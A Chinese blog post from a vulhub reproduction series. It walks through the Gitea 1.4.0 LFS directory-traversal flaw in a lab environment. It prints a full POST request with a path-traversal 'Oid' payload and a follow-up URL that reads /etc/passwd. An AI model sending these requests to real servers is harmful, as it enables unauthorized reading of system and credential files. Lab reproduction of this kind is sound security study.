Gitea 1.4.0 目录穿越导致命令执行漏洞

最新推荐文章于 2024-03-13 15:02:09 发布

小白萝卜

最新推荐文章于 2024-03-13 15:02:09 发布

阅读量415

点赞数

分类专栏： vulhub漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/EC_Carrot/article/details/117636087

版权

vulhub漏洞复现专栏收录该内容

178 篇文章 29 订阅

订阅专栏

漏洞背景

Gitea是从gogs衍生出的一个开源项目，是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误，导致未授权用户可以穿越目录，读写任意文件，最终导致执行任意命令。

漏洞复现

环境启动后，访问http://you-ip:3000，安装完环境后创建一个新的账号，再创建一个新的仓库，全部默认即可。
然后找到我们刚刚的项目，如vulhub/repo（用户名/仓库名），然后自行更改数据包并发送：

POST /vulhub/repo.git/info/lfs/objects HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 151

{
    "Oid": "....../../../etc/passwd",
    "Size": 1000000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
}

在这里插入图片描述

然后，访问http://your-ip:3000/vulhub/repo.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth，即可看到/etc/passwd已被成功读取：

在这里插入图片描述

小白萝卜

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Gitea 1.4.0 目录穿越导致命令执行漏洞

漏洞背景Gitea是从gogs衍生出的一个开源项目，是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误，导致未授权用户可以穿越目录，读写任意文件，最终导致执行任意命令。漏洞复现环境启动后，访问http://you-ip:3000，安装完环境后创建一个新的账号，再创建一个新的仓库，全部默认即可。然后找到我们刚刚的项目，如vulhub/repo（用户名/仓库名），然后自行更改数据包并发送：POST /vulhub/repo.git/info/lfs/ob
复制链接

扫一扫